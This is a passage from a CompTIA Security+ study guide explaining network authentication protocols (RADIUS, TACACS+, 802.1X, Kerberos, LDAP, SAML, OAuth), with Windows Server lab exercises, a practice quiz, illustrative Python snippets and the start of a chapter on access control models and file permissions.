replacement for LEAP. It has stronger security, while keeping the "lightweight" aspect.
 PEAP, or Protected EAP, isn't an EAP authentication method, but rather a protocol that
secures EAP authentication in a TLS tunnel.
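
As promised in the CHAP entry above, here's a minimal Python sketch of the response computation. The original
CHAP specification (RFC 1994) hashes the one-byte identifier, the shared secret, and the server's challenge
with MD5; the secret itself never crosses the wire. The secret value shown is a placeholder.

    import hashlib
    import os

    def chap_response(identifier, secret, challenge):
        # MD5(identifier || secret || challenge), per the original CHAP specification
        return hashlib.md5(bytes([identifier]) + secret + challenge).digest()

    # Server side: issue a fresh random challenge for each authentication attempt
    challenge = os.urandom(16)
    expected = chap_response(1, b"shared-secret", challenge)

    # The client computes the same hash from its own copy of the secret; the server compares
    assert chap_response(1, b"shared-secret", challenge) == expected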


RADIUS
Remote Authentication Dial-In User Service (RADIUS) was initially designed to provide full AAA support for
users dialing in to networks. Since then it's been extended to other PPP connections and to joining wireless
networks. RADIUS can be used by ISPs to authenticate internet users; it can also be used to join remote users
to internal enterprise networks whose services aren't accessible over the Internet.

Exam Objective: CompTIA SY0-501 4.2.7, 6.3.2.7


RADIUS is a client-server protocol, but probably doesn't work in the way you think. The RADIUS server
itself is on the internal LAN, and provides all the AAA functions. It can actually host a data file with all user
information, or it can rely on an external source like SQL, Kerberos, or Active Directory servers. The odd part
is that the client isn't the actual user workstation: instead it's the network access server (NAS, sometimes also
called the remote access server). The NAS can be on the internal LAN or at the remote site, and it serves as a
relay for all communication between user workstations and the RADIUS server. Connecting users actually
send their own authentication requests to the NAS, but the NAS passes them on to the RADIUS server for
authorization.

The actual transfer of credentials in RADIUS still uses PPP protocols like PAP, CHAP, or EAP; it's just a little
more complex due to the relaying nature of the protocol.


1. When the user first connects, the NAS requests authentication information. It could be transmitted via
PPP methods, or by other means such as a secure web form.
2. Once it receives user credentials, the NAS sends an Access Request message to the RADIUS server. It
contains not only the user's credentials, but also anything else the NAS knows about the user: network
address, telephone number, physical connection type, and so on. The password itself is encrypted, though
the rest is in plaintext.
3. The RADIUS server evaluates the credentials and gives one of three responses to the NAS: Access
Accept, Access Reject, or Access Challenge.
4. The NAS responds to the client according to the server response:

• An Access Accept message means the user is authenticated and joined to the network.
• An Access Reject message means the user is prompted again for credentials. After a set number of
failed attempts, the user is automatically disconnected.
• An Access Challenge message means the user is prompted for additional credentials, like a
secondary password or another authentication factor. This isn't a rejection, just a request for more
information before access is accepted. It's commonly used with more complex authentication
protocols.

Once the user is authenticated, the NAS continues to behave as an intermediary between the client
workstation and the network. Organizations can even link their RADIUS servers so that wireless users from one
organization can roam onto another's network, an arrangement called a RADIUS federation.
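
The packet formats are beyond the scope of this section, but the NAS's side of the exchange boils down to
mapping those three reply types to actions. Here's a toy Python illustration; the constants and the failure limit
are placeholders, not real RADIUS packet codes or required values.

    ACCESS_ACCEPT, ACCESS_REJECT, ACCESS_CHALLENGE = "Accept", "Reject", "Challenge"
    MAX_FAILURES = 3

    def nas_action(reply, failed_attempts):
        if reply == ACCESS_ACCEPT:
            return "authenticate the user and join them to the network"
        if reply == ACCESS_CHALLENGE:
            return "prompt for additional credentials (not a rejection)"
        # Access-Reject: re-prompt, or drop the connection after too many failures
        if failed_attempts + 1 >= MAX_FAILURES:
            return "disconnect the user"
        return "prompt for credentials again"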


TACACS+
RADIUS is another one of those protocols that's widely used but has issues with scalability, flexibility, and
security. A popular alternative is Terminal Access Controller Access Control System Plus (TACACS+), a
proprietary Cisco protocol with similar features. The plus is there because TACACS+ is based on, but not
backwards-compatible with, the earlier TACACS and XTACACS protocols, which are no longer supported.

Exam Objective: CompTIA SY0-501 4.2.3


TACACS+ has a number of advantages over RADIUS.
 While RADIUS uses UDP, TACACS+ uses TCP. Since TCP is connection-oriented, it provides
message acknowledgement, so when a client or server doesn't get a quick response it knows something
is wrong. It also scales better on large or congested networks.
 Unlike RADIUS, TACACS+ encrypts entire access request packets. Even if encrypting the password
itself is most important, protecting other system information from eavesdroppers enhances security.
 While RADIUS combines authentication and authorization into a single step, TACACS+ fully
separates all three steps of the AAA process. This allows any of the three to be individually handled by
a different server, or even a different protocol entirely.
 TACACS+ supports more non-IP protocols, such as AppleTalk, NetBIOS, Novell, and X.25.

TACACS+ isn't always better than RADIUS. It's more resource intensive, it's not compatible with all network
configurations, and while it's fairly open and interoperable it's still a proprietary solution. Additionally, it
wasn't really designed for user authentication like RADIUS; instead, TACACS+ is primarily intended for
remote administration of network devices.
Another alternative is Diameter, which has enhancements similar to TACACS+ and more but was explicitly
designed as a RADIUS successor. The name itself is even a pun on how it's twice as good as RADIUS.
Diameter might displace the others in the future, but for now it's mostly used in large-scale carrier
applications that require its full feature set, such as new 4G networks.

RAS
Another system for remote connection to a LAN is Remote Access Service, used by Windows Server. Like
RADIUS it's designed for dial-in connections, but it can work with any PPP connection. Unlike RADIUS, the
remote connection is directly to, and authenticated by, the Windows server. Newer additions add routing
capability, and are called Routing and Remote Access Service (RRAS).
RRAS allows remote clients to access the server's network, just like if they had joined it directly. It can be
used as a way to let remote users join the LAN, or it can provide Internet access, allowing a Windows server
to act as an ISP.

Note: Maybe because it's Windows and remote, RRAS sometimes gets confused with Remote Desktop
Protocol, but the two are very different. RDP is a remote control protocol; it runs the server's
applications locally using the server's CPU and other resources, and the network connection carries user
input one direction and screen output in the other. RRAS is a remote access protocol more like
RADIUS: remote clients run their own applications, and the server has to worry only about handling
communications.

802.1X
PPP authentication methods are just that: they're intended for users joining a LAN via a WAN connection.
Kerberos, meanwhile, is meant to centrally secure server resources on a non-secure network. There
are a lot of times when you might just want to restrict who joins a LAN on local connections—for example to
keep users from attaching unauthorized workstations, routers, or access points to the network. IEEE 802.1X is
an EAP extension meant for exactly this purpose.


Exam Objective: CompTIA SY0-501 4.3.5.2, 6.3.2.6


802.1X is most commonly seen in 802.11 Wi-Fi networks: it's the underlying technology of WPA-Enterprise
and WPA2-Enterprise, and other variants can even give strong security using WEP. However, it isn't limited
to Wi-Fi: it was originally developed for Ethernet, and can be used for other LAN technologies in the IEEE
802 family. The 802.1X protocol encapsulates EAP messages into EAP over LAN (EAPOL) frames, and it
relies on some sort of back-end AAA server. It was designed with RADIUS in mind, but that isn't strictly
required; Diameter will work, as will TACACS+ with some limitations.
There are three main components in the 802.1X system. For example purposes, we'll assume a typical
RADIUS back end.

Supplicant A device (like a workstation) that wishes to connect to the network.


Authenticator A network device, like a switch or WAP, which lies between the supplicant and the
LAN. It also serves the role of RADIUS client.
Authentication server A RADIUS server using EAP.

The authenticator serves as the gatekeeper of the network: all traffic to or from unauthorized supplicants is
blocked, except for the EAPOL frames used for authentication. It responds to any other traffic with a request
for credentials.

1. The supplicant uses EAPOL to send its identity to the authenticator, along with a requested EAP
authentication method.
2. The authenticator forwards the request to the authentication server in RADIUS format.

3. The authentication server responds to the authenticator in RADIUS format, which relays it to the
supplicant as EAPOL.

• If the ID and EAP method are accepted, it sends a challenge message.


• If the ID isn't valid, it sends a rejection.
• If the ID is good but the EAP method isn't supported, it sends a list of acceptable EAP methods, so
the process can repeat.


4. The supplicant sends its credentials to the authentication server, via the authenticator.
5. If the credentials are accepted, the authentication server notifies the authenticator to accept normal traffic
from the supplicant. If wireless encryption is in use, it also sends a session key for the authenticator to use
with that supplicant.
802.1X is popular and fairly effective, but it does have some flaws. In particular, since authentication happens
only once, it's vulnerable to MitM attacks on the physical network. Wireless networks are actually better-
protected by physical topology and encryption, but on wired networks a local attacker could literally insert a
hub or switch between the supplicant and authenticator, inheriting the supplicant's permissions. This means
that 802.1X shouldn't be considered a complete access security solution for wired LANs.
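
The authenticator's gatekeeping role described above can be pictured as a per-port state machine: until the
back-end server accepts the supplicant, only EAPOL frames are allowed through. The EtherType value in this
toy Python sketch is the real one used by EAPOL; everything else is a simplification for illustration.

    EAPOL_ETHERTYPE = 0x888E  # EtherType used by EAPOL frames

    class SwitchPort:
        def __init__(self):
            self.authorized = False
            self.session_key = None

        def allows(self, ethertype):
            # Unauthorized ports pass only the EAPOL authentication traffic
            return self.authorized or ethertype == EAPOL_ETHERTYPE

        def on_radius_accept(self, session_key=None):
            # Called after the authentication server returns Access-Accept
            self.authorized = True
            self.session_key = session_key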

Exercise: Installing a RADIUS server


In this exercise, you'll install a RADIUS server in Windows Server 2012.
Do This How & Why

1. On the Windows Server 2012 VM, install the network policy server role.

a) In Server Manager, click Add roles and features. The Add Roles and Features Wizard window opens.

b) Click Next twice. To skip the intro screen and select the default installation type.
You can now select what server to install the role on.

c) Click Next. To select the current server and view the list of roles.

d) Check Network Policy and Access Services. A new window pops up, notifying you of additional features the role requires.

e) Click Add Features. To close the window.

f) Click Next four times. You'll accept all defaults.

g) Click Install. The installation process may take a few minutes.

h) Click Close.

2. Configure the network policy server. You'll configure it as a RADIUS server to provide 802.1X
authentication for a wireless access point.

a) In Server Manager, click Tools > Network Policy Server. The Network Policy Server console window appears.

b) From the Standard Configuration list, select RADIUS server for 802.1X Wireless or Wired Connections.

c) Below the list, click Configure 802.1X. The Configure 802.1X wizard appears. You can configure the server either to authenticate wireless clients or wired Ethernet clients.

d) Click Secure Wireless Connections, then click Next. Next, you need to add RADIUS clients.

3. Add a RADIUS client. In this context, a client is the WAP that requires user
authentication.

a) Click Add. The New RADIUS Client window opens.

b) Enter a name, IP address, and shared secret (password) in the window, then click OK. If you have a real WAP configured for the exercise, enter its IP address.

The WAP now appears in the client list.

4. Configure the server to authenticate via digital certificates.

a) Click Next. 802.1X is a form of EAP, so it allows different authentication types.

b) From the Type list, select Microsoft: Protected EAP (PEAP) and click Next. To select digital certificates as an authentication method.

c) Click Add. The Add Groups window opens.

d) Type Domain Users in the object name field, and click OK.

e) Click Next twice, then click Finish. To accept all other defaults.


To complete this process for real, you would need to create and export a digital certificate for wireless clients
to authenticate with. You would also need to configure your WAP to use 802.1X (WPA Enterprise)
authentication with your server's IP address and password.

Kerberos
Kerberos was developed at MIT as part of Project Athena, a project to develop a distributed computing
system. It was named for the three-headed guard dog owned by Hades in Greek mythology. It was designed to
provide mutual authentication and encryption for secure communication between clients and servers on a non-
secure network. Currently at version 5, Kerberos has been widely adopted: it's the default authentication
protocol for Windows domains, and is also used by many Unix-like operating systems, web applications,
embedded devices, and other products. The original implementation is also available under a free license from
MIT at http://web.mit.edu/kerberos/, though since it uses strong encryption it's still subject to
some US cryptographic export laws.

Exam Objective: CompTIA SY0-501 4.2.2


Kerberos is basically network security via a single sign-in method: nodes negotiate with each other on the
word of a trusted third-party, the Kerberos server. Users go through the authentication process when they first
connect, and after that they can communicate securely with any other node; the Kerberos protocol presents
their credentials and sets up security without further user input.
A Kerberos system has several components.


 The basic unit of a Kerberos network is a realm. Large organizations can have multiple realms, but
each realm has a unique name within the organization. Every principal, or node, is a member of a
realm.
 Each realm is controlled by a key distribution center (KDC) which distributes the cryptographic tokens,
or tickets, used to manage network access. The KDC has two components, which usually are on the
same physical host.

• The authentication server (AS) authenticates users and gives them a special ticket-granting ticket
(TGT). The AS holds the full list of users and servers in the realm, and the secret key of each.
• The ticket-granting service (TGS) validates TGT holders, and issues them temporary credential
tickets and cryptographic session keys to access specific resource servers. A remote TGS (in another
realm) is called an RTGS.

Kerberos authentication
Some implementations of Kerberos use public key cryptography for authentication, but the core protocols are
designed to work solely with symmetric cryptography. Instead of the private half of a key pair, the secret key
for a user or service is a salted, hashed password created during setup. Additionally, there's no direct
communication between the KDC and resource servers: all communication is between clients and servers.
Messages are also time-stamped to prevent replay attacks, so all nodes need to be time-synchronized.
Guaranteeing secure communication under those constraints takes a fairly exacting process, but it allows
mutual authentication without any sensitive information being shared as plaintext.


1. The user logs into a client workstation with a user name and password. The client immediately requests a
TGT from the AS. This is a plaintext message, so it doesn't include a password: only the user name, AS
name, network address, and requested ticket lifetime.

2. If the AS finds the user in its database, it sends back two messages.

• A TGT, encrypted with the TGS secret key. It contains the information from the initial request, plus
the TGS ID, a timestamp and a newly created TGS session key to be shared between the client and
TGS.
• A matching message encrypted with the user's secret key. It contains the TGS ID, timestamp,
lifetime, and the same session key. This is how authentication actually happens: only the valid user
password can decrypt this message and reveal the session key.

3. After learning the session key, the client sends three messages to the TGS to request access to a specific
server.

• The TGT
• An authenticator encrypted with the session key. It contains the client name and a timestamp.
• A plaintext message containing the name of a resource server and requested ticket lifetime.

4. The TGS decrypts the TGT with its secret key to learn the session key, then uses the session key to
decrypt the authenticator. If the service, timestamp, and user all seem valid, it sends the following
messages in response.

• A credential ticket for the service, encrypted with the resource server's secret key. Much like a TGT
it has the user's information, a timestamp, lifetime, and a service session key created by the TGS.
• A matching message encrypted by the TGS session key, and containing the service session key.


5. The client decrypts the second message to learn the service session key, and uses it to create a new
authenticator. It sends the authenticator and service ticket to the resource server.
6. The resource server decrypts the service ticket to learn the session key, and uses the session key to
decrypt the authenticator. If all information checks out, the client is authenticated on the resource server,
and they can communicate securely. This step can also use mutual authentication.
Whenever the client wants to log into a new service, or when a service ticket expires, it can present its TGT to
the TGS again for a new request. What happens when the TGT itself expires depends on network settings and
implementation: the user might need to log in again, or the client might be able to transparently request a new
TGT.
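
To make steps 1 and 2 more concrete, here's a drastically simplified Python sketch that uses Fernet from the
third-party cryptography package as a stand-in for Kerberos's symmetric ciphers. The principal names, message
layout, and key-derivation settings are illustrative assumptions, not the real Kerberos formats.

    import base64
    import hashlib
    import json
    from cryptography.fernet import Fernet

    def key_from_password(password, salt):
        # Kerberos derives a principal's secret key from a salted, hashed password
        raw = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
        return base64.urlsafe_b64encode(raw)

    user_key = key_from_password("correct horse battery", b"REALM/alice")  # known to AS and user
    tgs_key = Fernet.generate_key()                                        # known to AS and TGS only
    session_key = Fernet.generate_key().decode()

    # Message 1: the TGT, readable only by the TGS
    tgt = Fernet(tgs_key).encrypt(json.dumps({"user": "alice", "session_key": session_key}).encode())

    # Message 2: readable only by someone who knows alice's password
    for_user = Fernet(user_key).encrypt(json.dumps({"session_key": session_key}).encode())

    # The client proves its identity simply by being able to decrypt message 2
    client_key = key_from_password("correct horse battery", b"REALM/alice")
    recovered = json.loads(Fernet(client_key).decrypt(for_user))
    assert recovered["session_key"] == session_key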

LDAP
Lightweight Directory Access Protocol is a simpler alternative to the Directory Access Protocol defined by the
ITU-T X.500 standard. In this context, a "directory" is a database that stores information about network
users, systems, services, and so on, and LDAP allows users to make queries to that database. One of its most
common uses is as a central place to store and manage user names and passwords. For instance, RADIUS
servers commonly use LDAP databases for storing passwords. LDAP can even serve as an authentication
method for other services in itself, with some limitations.

Exam Objective: CompTIA SY0-501 4.2.1


LDAP queries are commonly used in scripts or sent as URLs. Their syntax is fairly easy to recognize, since
they have objects separated by commas. For example, the following URL would go to ldap.javatucana.com
and perform a base query on Rose Schiller.
ldap://ldap.javatucana.com/CN=Rose%20Schiller,DC=javatucana,DC=com

Active Directory used by Windows servers is based on LDAP and Kerberos, using LDAP for queries and
Kerberos for authentication and SSO. LDAP is also popular in Unix and other systems, sometimes with other
plugins to let it operate for authentication purposes.
LDAP has some limitations. It isn't very useful for SSO in itself, even though it's commonly used by intranet-
based SSO authentication services. It's not very secure either, since it's meant to operate on trusted networks.
Secure LDAP (LDAPS) uses SSL or TLS encryption, and operates on port 636 instead of port 389. Even with
TLS, LDAPS has a large attack surface, so it's not generally used directly over the public internet.
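
For reference, the same kind of query can be made programmatically. Here's a minimal sketch using the
third-party Python ldap3 package against the hypothetical javatucana.com directory from the URL example
above; the bind account and password are placeholders.

    from ldap3 import ALL, Connection, Server

    # use_ssl and port 636 give LDAPS; drop them for plain LDAP on port 389
    server = Server("ldap.javatucana.com", port=636, use_ssl=True, get_info=ALL)
    conn = Connection(
        server,
        user="CN=svc-lookup,DC=javatucana,DC=com",  # placeholder bind account
        password="placeholder-password",
        auto_bind=True,
    )

    # Equivalent of the base query on Rose Schiller shown earlier
    conn.search("DC=javatucana,DC=com", "(CN=Rose Schiller)", attributes=["mail", "memberOf"])
    for entry in conn.entries:
        print(entry)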

SAML
Security Assertion Markup Language (SAML) is an open XML-based standard that's used to exchange
authentication and authorization information. SAML 1.0 was first standardized in 2002, and the current
version is SAML 2.0. It's commonly used by SSO environments, especially those using federated identity
systems in enterprise environments. For example, it's the standard used for SSO by Salesforce and Google's
enterprise apps.

Exam Objective: CompTIA SY0-501, 4.2.8, 4.2.11


SAML works by sending XML-based messages between systems, and is transparent to the end user. There are
three defined roles in a SAML system.

Principal A client seeking to be authenticated, typically an end user.


Identity provider An authentication server that holds a directory of users and their permissions.
Service provider A server containing resources, such as a web application.


The SAML authentication process is in a way the opposite of the Kerberos process. The principal starts by
directly contacting the service provider, and the service provider asks the principal for an authentication token
issued by the identity provider. If the principal already has one, the service provider gives access; if not, the
principal automatically negotiates with the identity provider for authentication. The service provider and
identity provider don't need to communicate directly as part of this process, only to maintain a trust
relationship.
SAML doesn't specify an authentication mechanism. The identity provider can be configured to use RADIUS,
LDAP, SQL, or any number of other authentication methods, just as long as it exchanges the right sort of
SAML tokens with the service provider. Depending on the network's configuration, service providers can
handle authorization themselves, but SAML messages can also transfer authorization data from one system to
another. In fact, the XACML standard used for ABAC is easily integrated with SAML, since both were
designed by OASIS to interoperate.

Note: Like any authentication service, SAML is vulnerable to certain attack types, depending on
implementation and version. Due to its XML based tokens, one attack used against SAML is XML
signature wrapping. In this attack, a MitM attacker carefully modifies signed XML messages to change
what they do without invalidating their signatures. Depending on the message this might involve giving
users extra permissions, giving permissions to a different user instead, or injecting arbitrary content.
SAML 2.0 allows developers to perform validation that will detect such attacks, but only if it is
configured properly.
One popular SAML implementation is the open source Shibboleth project, named for a linguistic concept by
which social groups learn to identify each other. Many major organizations, especially academic institutions,
have formed Shibboleth federations to manage inter-institutional identity management.

OAuth and OpenID


SAML is a well-established standard but it has some limitations. It works best for SSO in web applications,
between providers that have a strong trust relationship with each other. For various reasons, it doesn't work
very well with native mobile applications, or in many consumer-oriented SSO environments. Two interrelated
standards that have emerged recently are Open Authorization (OAuth) and OpenID.

Exam Objective: CompTIA SY0-501 4.2.9, 4.2.10


One common place you might have seen OAuth being used is when one application asks to be given
permission to use another application's resources. For example, imagine that you join an online game, and it
asks to access your Facebook contacts to see if anyone else you know plays it already, or to post your in-game
achievements as status updates. Just because you trust the game to do that doesn't mean you want to give it
your Facebook password: what if it (or someone at the game company) used those permissions to access your
private messages and photos, or change your Facebook settings?


OAuth solves that problem by access delegation, allowing you to give the game authorization to use some
(but not all) of your Facebook account. It designates four roles.

Resource owner A person or application who has access to some computing resource and account
credentials that specify access to them. In the above example, you are the owner of the
resources contained in your Facebook account.
Client application An application that wants to access a resource. Clients aren't given complete access to the
resource, but only within a scope authorized by the owner. The game that wants access to
your contacts is a client, and "view contacts and make status postings" is a scope.
Resource server The server containing access to the resource; in this case, Facebook itself.
Authorization The server that validates the identity and permission of the resource owner and issues
server access tokens to the client. It can be the same as the resource server, but doesn't need to
be. Facebook is both a resource server and an authorization server, whether or not they're
located on the same literal servers.

To apply this process so you can finally play your game, the game server asks you for permission to access
your Facebook account. When you click Yes you're asked to enter your Facebook credentials, but you submit
them directly to Facebook rather than exposing them to the game. Facebook then issues an access token to the
game, which it can use only in the ways specified. Like SAML, OAuth can give access based on ABAC
principles, so it's possible to give very fine control of what kinds of access are and are not permitted.
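
Under the hood, the most common OAuth 2.0 flow ends with the client exchanging a short-lived authorization
code for an access token. Here's a hedged sketch using the Python requests package; every URL, identifier, and
endpoint below is a made-up placeholder, and real providers add further details such as PKCE.

    import requests

    auth_code = "code-returned-to-the-redirect-uri"  # placeholder from the consent step

    # The client exchanges the code for an access token at the authorization server
    token_response = requests.post(
        "https://auth.example.com/oauth/token",  # placeholder token endpoint
        data={
            "grant_type": "authorization_code",
            "code": auth_code,
            "redirect_uri": "https://game.example.com/callback",
            "client_id": "game-client-id",
            "client_secret": "game-client-secret",
        },
    )
    access_token = token_response.json()["access_token"]

    # The token is then presented to the resource server, limited to the granted scope
    contacts = requests.get(
        "https://api.example.com/me/contacts",  # placeholder resource endpoint
        headers={"Authorization": f"Bearer {access_token}"},
    )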
OAuth is only an authorization framework; it doesn't actually handle SSO authentication between systems. It
can't, for example, let you just use your Facebook account credentials to sign into the game. For that, the
separate but complementary OpenID standard has become popular. The current version, OpenID Connect,
runs as a layer on top of the OAuth framework.
OAuth and OpenID Connect are the basis for, or at least supported by, an ever-increasing number of
organizations, especially those hosting consumer-oriented web apps and services.

Note: OAuth and OpenID Connect can provide strong security when implemented properly, but still
have potential vulnerabilities. One is the fact that neither includes encryption, signatures, or other
security in the language itself. Instead, both rely on TLS connections between all participants, so are
vulnerable to anything that can compromise the TLS protection. More seriously, since it relies on human
users to supply credentials to an authentication server, a phishing page can give the appearance of
asking a user for OAuth authorization for limited account functionality, while actually stealing
credentials for the entire master account.


Exercise: Examining Active Directory


Windows domains are controlled via Active Directory, Microsoft's directory service. AD uses LDAP,
Kerberos, and DNS as its primary protocols. You'll examine some of AD's workings.
Do This How & Why

1. Examine Active Directory.

a) In Server Manager, click Tools. The menu shows your server's various roles. Several involve
Active Directory functions.

b) Click Active Directory Administrative Center. The Active Directory Administrative Center window appears.

c) Maximize the window. On the left you can browse AD areas. On the right are some
helpful links and a password reset tool for domain users.

2. Browse AD objects. Active Directory stores objects representing users, computers, devices, and other resources on the network. It uses LDAP as the primary protocol for storing and accessing them.

a) In the left pane, click mwha (local). To select the local domain. The center pane shows a number of folders representing different object types in AD's structure. Each also has a type listed.

b) Double-click Users. This folder contains users and groups currently registered on
the domain.

c) Navigate to the System folder. You'll have to click mwha (local) in the left pane, then double-
click System in the middle. It contains additional folders
representing system settings. LDAP, and AD, store objects in a
hierarchical tree.

d) Close the Active Directory Administrative Center. You'll view objects another way.

3. View Active Directory users. The other AD consoles give you better access to different
aspects of AD.

a) In Server Manager, click Tools > Active Directory Users and Computers. The Active Directory Users and Computers console opens. It has some, but not all, of the folders you saw before.

b) On the left, navigate to mwha.local > Users. It's the same list of groups and users you saw in the Administrative Center.

c) Double-click Administrator. AD uses LDAP to store and retrieve all user settings and
credentials. You can even install a Microsoft Exchange email
server to distribute mail via LDAP. The Properties window
appears, with all settings for the Administrator account.

d) Close the Properties window.

e) Click the mwha.local > Computers folder. The WIN7 client computer is also an AD object.

f) Close Active Directory Users and Computers.


4. View Kerberos settings. While it's less obvious, AD uses Kerberos as the SSO protocol
to authorize access to all network resources.

a) In Server Manager, click Tools > Group Policy Management. The Group Policy Management console opens.

b) On the left, expand Forest: mwha.local > Domains > mwha.local.

c) Right-click Default Domain Policy and click Edit. The Group Policy Management Editor console opens. It allows you to edit domain security policies.

d) In the left pane, navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Account Policies > Kerberos Policy. You can view and edit Kerberos authentication and ticket policies for the domain here. You'll keep the defaults.

5. Close both console windows. Leave Server Manager open.

Assessment: Authentication protocols


1. Which protocol is more of a message framework than an authentication method in itself? Choose the best
response.
 CHAP
 EAP
 MS-CHAP
 PAP


2. Your wireless network is configured in 802.1X mode. What kind of server does it most likely use as a
back end? Choose the best response.
 KERBEROS
 RADIUS
 TACACS+
 TKIP

3. Your remote access system currently uses RADIUS, but one administrator is proposing replacing it with
TACACS+. What benefits might this provide? Choose all that apply.
 Better able to support non-IP protocols
 Better suited to large networks
 Less complicated to administer
 More secure
 More focused on user authentication

4. You've been asked to help consult for security on an application that's designed to interoperate with
Google and Salesforce SSO systems. What protocol should you study first? Choose the best answer.
 Kerberos
 LDAP
 RADIUS
 SAML

5. Unlike LDAP, LDAPS ________? Choose all that apply.


 Includes SSL or TLS encryption
 Is compatible with Unix-based operating systems
 Is safe for use on the public internet
 Uses port 389
 Uses port 636

6. Your company is developing a custom web app for the sales team. It should be able to access a list of
Salesforce contacts, but for security reasons the app shouldn't be able to access the actual Salesforce
account. What standard would allow this? Choose the best response.
 Kerberos
 OAuth
 OpenID Connect
 SAML


Summary: Authentication
You should now know:
 About the AAA process, authentication factors, common digital credentials, and how SSO and
federated identities work.
 About common network authentication protocols, including PPP authentication protocols, RADIUS
and its relatives, Kerberos, LDAP, and SAML.



Chapter 9: Access control
You will learn:
 About access control principles
 About account management


Module A: Access control principles


Just because you're sure that's Peggy, that doesn't mean you want to let her borrow your car. Likewise, just
because a user is authenticated doesn't mean they have access to all resources. This is why the next step,
authorization, is important. Sometimes, especially on the network, authorization is carried out in the same
step as authentication. Other times, like for a user logged into a computer, authorization is a separate step
carried out whenever an authenticated user tries to access a secured resource.
You will learn:
 How to compare and contrast access control models
 About ACLs
 About NTFS permissions and inheritance

Access control models


Any authorization system needs to have a consistent method to determine what privileges are and are not
associated with each user. There are several approaches for accomplishing this. Five of the most
commonly used models are:

Exam Objective: CompTIA SY0-501 4.3.1

DAC In discretionary access control, the owner or creator of each controlled object decides who
can access it and what permissions they have. This model is used by Windows and most
common Unix-like operating systems, and it's widely used in other business applications as
well.
MAC In mandatory access control, administrators decide security classifications, or labels,
assigned to each user and each resource. A user can only access a given resource if their
labels match: for example, a user with Secret clearance can access Secret files. MAC is
difficult to implement properly, but allows very high security. It was developed for military
use but is common in other high-security environments and operating systems.
Rule-based Access is determined by a set of rules configured by administrators; these can either be
access control static, or dynamic and triggered by other events. The term "rule-based access control" is used to
describe several quite different approaches. Some are more sophisticated versions of
MAC, while others are simpler. The most familiar application of this model is in routers and
firewalls, which use rules to allow or deny traffic.
Role-based Similar to MAC in that administrators define permissions, but instead of clearance levels
access control users are assigned to one or more roles, for example representing job functions. Each role
has a list of permissions. Role-based access control is popular in commercial applications
and military systems.
Note: RBAC might be used to refer either to rule-based or role-based
models, so when you see the acronym you need to determine which is
meant by context.
ABAC Attribute-based access control applies security attributes to resources, users and
environments, then defines policies governing combinations of those attributes. When a
user requests access to a resource, it's approved or denied based on the policy. ABAC is a
flexible system which can be used to implement other models within it.


Beyond the way permissions are assigned, access control can also be classified by what the default permission is.

Implicit Deny Access is denied unless a rule explicitly allows it. A permissions list based entirely
on explicit allowances is often called a whitelist. Secure access control systems
almost always are based on implicit denial. MAC is by definition.
Implicit Allow Access is allowed unless a rule explicitly denies it. A permissions list containing
only explicit denials is called a blacklist. Rule-based access control can be based
on implicit allowance, but a more familiar example might be antivirus or IPS
software that only acts when it detects a problem.

While implicit deny is the foundation of a secure access control system, many allow both explicit allow and
explicit deny rules. This makes it a lot easier to create exceptions. For example, in a file system based on
implicit deny, you could use explicit allow to give users access to a folder, but explicit deny to restrict a
particular file in that folder.
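As a minimal illustration of these defaults (not modeled on any particular product), the following Python sketch evaluates a request against explicit allow and explicit deny rules, with explicit deny winning and implicit deny applying when nothing matches:

def is_allowed(subject, resource, allow_rules, deny_rules):
    """Evaluate one access request against explicit rule lists.

    Explicit deny always wins; if neither list matches, access is
    implicitly denied (whitelist behavior)."""
    request = (subject, resource)
    if request in deny_rules:      # explicit deny overrides everything
        return False
    if request in allow_rules:     # explicit allow
        return True
    return False                   # implicit deny: no matching rule

# Example: a user is allowed into the folder, but one file is explicitly denied.
allow = {("alice", "reports/"), ("alice", "reports/summary.txt")}
deny = {("alice", "reports/salaries.xlsx")}
print(is_allowed("alice", "reports/summary.txt", allow, deny))    # True
print(is_allowed("alice", "reports/salaries.xlsx", allow, deny))  # False: explicit deny
print(is_allowed("alice", "reports/other.txt", allow, deny))      # False: implicit deny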

Discretionary access control


The DAC model provides overall security while being fairly flexible and easy to implement, so it's widely
used in operating systems. In the typical DAC system, every file, folder, or other resource has an owner. The
owner sets access permissions by editing an access control list (ACL) attached to the object.
A simple example of DAC is the permissions system used by Linux and other Unix-like operating systems. In
that system, every file or directory is owned by a particular user, and it's also assigned to a particular group,
which can include multiple users. Users and groups are both identified by numbers in the operating system,
but users usually see the associated name. The owner (or an administrator) can then configure the object's
access permissions, or modes, separately for the owner, the group, and for any other user. The permissions are
fairly simple as well:

Read (r) Read a file, or list the contents of a directory.


Write (w) Modify a file, or create, modify, or delete files within a directory.
Execute (x) Execute a file, or enter a directory and access its subdirectories.

In this example, the directory's contents all belong to the user waffle, though the groups differ.
 The proto directory also is assigned to waffle's private group. waffle can read, modify, and execute
(enter) it (rwx). Any other user can read the directory's contents, but not write to it or enter it (r--). It
has group permissions, but unless other people are in waffle's group, they're unlikely to come up.
 The proto.old directory has the same permissions as proto, but it's been assigned to the archives
group. This means anyone who belongs to the archives group can read and enter it (r-x).
 sales.txt and its backup sales.txt~ both are assigned to the sales group. waffle can read and
modify it but not execute it (rw-), members of the sales group can only read it (r--), and other users
can't access it at all (---).

You might wonder why the owner isn't just assumed to have complete permissions to an object, but there's a
very good reason for that. Blocking write access to your own files makes it harder to modify them by mistake,
and lacking execute permissions makes it hard to accidentally run what looks to be a data file but is actually a
malicious executable or script. It also protects programs you run from doing those things without your
knowledge.
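To make the mode bits more concrete, here's a short Python sketch that prints a file's permission string and then strips the owner's write and execute bits, much as a cautious owner might. The filename is hypothetical, and the snippet assumes a Unix-like system where the file already exists.

import os
import stat

path = "sales.txt"   # hypothetical file used for illustration

mode = os.stat(path).st_mode
print(stat.filemode(mode))   # e.g. '-rw-r--r--': owner rw, group r, others r

# Strip the owner's write and execute bits so the file can't be modified
# or run by mistake; the owner can restore them later with chmod.
os.chmod(path, mode & ~(stat.S_IWUSR | stat.S_IXUSR))
print(stat.filemode(os.stat(path).st_mode))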


This relates to one of the main weaknesses of DAC: it makes it easy for trojan horse attacks to bypass
permissions. When you run a program, you're effectively giving it your own permissions, and if it changes
files, alters their permissions, or leaks them to untrusted parties it might be hard for you to notice.

NTFS permissions
In Windows, NTFS volumes use a DAC model similar to that of Unix-like operating systems, but one that's a bit
more flexible and complex.

Exam Objective: CompTIA SY0-501 2.3.3, 4.3.6, 4.4.2.9

The general principles of it are the same: objects are owned by someone, and users or groups can have
different levels of access. There's no built-in third "others" class as in Unix, but groups such as Everyone or
